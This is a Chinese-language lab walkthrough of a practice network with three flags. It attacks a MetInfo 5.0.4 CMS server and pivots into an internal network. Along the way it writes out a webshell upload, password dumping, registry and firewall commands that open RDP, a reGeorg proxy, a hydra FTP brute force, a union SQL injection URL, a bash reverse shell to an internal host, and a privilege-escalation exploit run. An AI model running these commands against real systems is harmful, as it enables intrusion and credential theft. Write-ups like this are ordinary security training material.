靶场练习笔记（2）

环境：MetInfo5.0.4-CMS,一外两内
配置：外网地址192.168.100.130
目标：三个flag

一、信息收集

1、用御剑扫描后台，结果如图

2、百度搜MetInfo5.0.4-CMS漏洞。利用文件上传漏洞上传木马
原因：在百度搜索过程中发现有大佬说，MetInfo文件上传漏洞，影响了很多的MetInfo版本，与其学习其他漏洞，不如先学文件上传。

二、拿外网shell

1、利用从大佬偷学来的文件上传漏洞，上传一句话木马，并用菜刀连
![在这里插入图片描述](https://img-blog.****img.cn/20191122172508845.png
2、查看权限whoami为system
3、QuarksPwDump.exe抓密码解密后为（a1b2c3）；

开放3389：
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
防火墙释放3389
Netsh firewall set portopening TCP 3389 ENABLE
4、尝试远程连接，拿到flag1

三、进攻内网

1、在外网上查看网卡，发现多出一块（10.200.1.10）

2、收集内网信息
方法1：通过代理进行内网扫描（但是失败了）
eg:
1】上传tunnel.nosocket.php到192.168.100.130
2】在kali里的编辑vi /etc/proxychains.conf，在最后一行添加socks5 127.0.0.1 8888
切换到kali里tunnel.nosocket.php所在目录，运行
python reGeorgSocksProxy.py -u http://192.168.100.130/tunnel.nosocket.php
proxychains nmap -sn -PE 10.200.1.0/24

方法2：查看用户的历史纪录
eg:查看浏览器纪录（C:\Documents and Settings\Administrator\Local Settings\History）

3、用htdra**ftp：//10.200.1.15的地址，然后成功登陆ftp
proxychains hydra -l admin -P pass.txt ftp://10.200.1.15

4、ftp://10.200.1.15/oa在这里发现flag2

5、访问http://10.200.1.16/

利用从10.200.1.15得到的oa文件，猜测http://10.200.1.16/admin/login.php是它的后台登陆界面；

5、尝试在10.200.1.15发现的源代码，进行代码审计，在message.php中发现sql注入漏洞，参数id；

经过手工检测，可以判断使用union，onder by=2，id=1。结合sqlmap扫描
http://10.200.1.16/message.php?id=-1%20union%20select%201,database();
Version=5.0.77
Database=my_oa

6、点击个人信息，发现可能存再文件上传漏洞；上传木马，成功

7、访问木马，拿到shell
1】先用whoami,发现是apache权限，权限太低，尝试提权

2】uname -a
Linux localhost.localdomain 2.6.18-194.el5 #1 SMP Fri Apr 2 14:58:14 EDT 2010 x86_64 x86_64 x86_64 GNU/Linux
3】进行端口转发
上传ew
先在192.168.100.130的cmd里切换到ew目录：ew_for_Win.exe -s lcx_tran -l 4444 -f 物理机地址 -g 5555

在大马命令行输入bash -i>& /dev/tcp/10.200.1.10/4444 0>&1
在物理机里切换到nc目录nc.exe -lvvp 555

4】利用大马上传提权exp

5】返回物理机，切换到大马上传的路径，更改exp权限（chomd 777 exp1），执行exp（./exp1），查看whoami，切换到root目录下即可看到flag3